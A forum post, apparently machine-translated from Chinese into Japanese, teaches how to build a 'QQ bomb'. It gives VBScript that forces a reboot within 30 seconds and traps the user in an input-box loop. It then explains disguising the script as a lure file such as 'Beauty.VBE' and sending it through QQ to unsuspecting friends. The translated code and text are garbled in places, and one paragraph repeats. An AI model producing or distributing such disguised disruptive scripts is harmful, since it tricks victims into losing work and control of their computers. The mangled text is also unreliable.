<スーさんがシェアしました>¤清城¤位置システムの確立を記念して、簡単なQQ爆弾の作成方法が発行されました

オリジナルポスター: チンチェン@エルダー@スーハイ ビュー: 737 返信: 5 で投稿される: 2012-06-03 01:04:01
厳粛に宣言します: このメソッドは純粋に娯楽のためです。違法行為には使用しないでください。使用しない場合、その結果は自己責任となります。最初のステップとして、次のコードをメモ帳にコピーします。エラー時再開 nextdim WSHshellAset WSHshellA = wscript. createobject("wscript.shell") WSHshellA。 run "cmd.exe /c shutdown -r -t 30 -c "「早く、7723 が最高だと言ってください。言わなければ、30 秒以内にコンピューターをシャットダウンします。信じられないなら、****""", 0, truedim ado while (a<>"7723 が最高です") a = inputbox ("7723 が最高だと言ってください、急いで、言ってください) ""7723 が最高です" "", "言うか言わないか", "言わない", 8000, 7000) msgbox chr (13) chr (13) chr (13) a, 0, "MsgBox" ループ上のテキストは印象を与えることなく自由に変更できます。 MMさんに送れば、強制的に「愛してる」と言わせることができます。その方法は、上記の7723を効果に影響を与えずに任意に変更できるというものです。 2 番目のステップは、メモ帳ファイルの名前を *** に変更することです。 VBEのようなシンプルなQQボム(ファイル名は「Beauty.VBE」など任意)が作成できました。誰かがこの QQ 爆弾を実行すると、30 秒後に自動的に停止します。それを使用する方法について話しましょう。これを使用する最も簡単な方法は、それを友人に直接送信して実行させることです。そうすると、友人はだまされてしまいます。さらに悪質なものがもう一つあります。オンラインではない QQ 友人に QQ オフライン ファイルを送信できます。ほぼ 80% の人が、このファイルが何であるか知りたくなり、混乱してファイルを開くでしょう。開けるとQQボムにイタズラされます。このQQ爆弾の威力を試すこともできます。 2 番目のステップは、メモ帳ファイルの名前を *** に変更することです。 VBEのようなシンプルなQQボム(ファイル名は「Beauty.VBE」など任意)が作成できました。誰かがこの QQ 爆弾を実行すると、30 秒後に自動的に停止します。この QQ 爆弾の威力を自分でテストすることもできます。学習後は忘れずに返信してください。 (相手がそれを送ってきた場合は、shutdown -a と入力して解読してください)。
返事 🤍 0 📤 共有 集める

返信 (5)

ソファ兄が座った
よく分からなかった。。
ずっと前から知っていましたが、でも私は易言語で書きました。
あの……メモ帳のファイルはどうやって探すんですか?それに、スマートフォンに害はありませんか?
いい投稿。。
— すべての返信が読み込まれました —

返信を残す